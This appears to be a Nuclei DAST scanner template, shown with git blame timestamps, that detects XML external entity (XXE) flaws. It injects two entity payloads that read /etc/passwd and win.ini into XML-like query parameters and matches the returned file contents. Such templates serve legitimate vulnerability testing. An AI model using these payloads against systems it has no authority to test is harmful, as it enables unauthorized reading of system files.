nuclei-templates/dast/vulnerabilities/xxe/generic-xxe.yaml

54 lines
1.3 KiB
YAML
Raw Normal View History

2024-04-08 06:45:08 +00:00
id: generic-xxe
2024-03-16 18:44:49 +00:00
info:
2024-04-08 06:45:08 +00:00
name: Generic XML external entity (XXE)
2024-03-16 18:44:49 +00:00
author: pwnhxl
severity: medium
reference:
- https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py
metadata:
max-request: 2
2024-03-23 09:32:51 +00:00
tags: dast,xxe
2024-03-16 18:44:49 +00:00
variables:
rletter: "{{rand_base(6,'abc')}}"
http:
2024-03-31 19:55:42 +00:00
- pre-condition:
2024-03-26 07:21:56 +00:00
- type: dsl
dsl:
- 'method == "GET"'
2024-03-16 18:44:49 +00:00
payloads:
xxe:
- '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:///c:/windows/win.ini"> ]><x>&{{rletter}};</x>'
- '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:////etc/passwd"> ]><x>&{{rletter}};</x>'
fuzzing:
- part: query
keys-regex:
- "(.*?)xml(.*?)"
fuzz:
- "{{xxe}}"
- part: query
values:
- "(<!DOCTYPE|<?xml|%3C!DOCTYPE|%3C%3Fxml)(.*?)>"
fuzz:
- "{{xxe}}"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: regex
name: linux
part: body
regex:
- 'root:.*?:[0-9]*:[0-9]*:'
- type: word
name: windows
part: body
words:
- 'for 16-bit app support'
# digest: 490a0046304402200765457e7ce86f2875c9b0446d1e4d4a3f035e95c8cb70d2c685bed047e1883c022000fb0dbfce1acce174129de4808904972d457aae4cc27dd68672d8e5a14d49b1:922c64590222798bb761d5b6d8e72950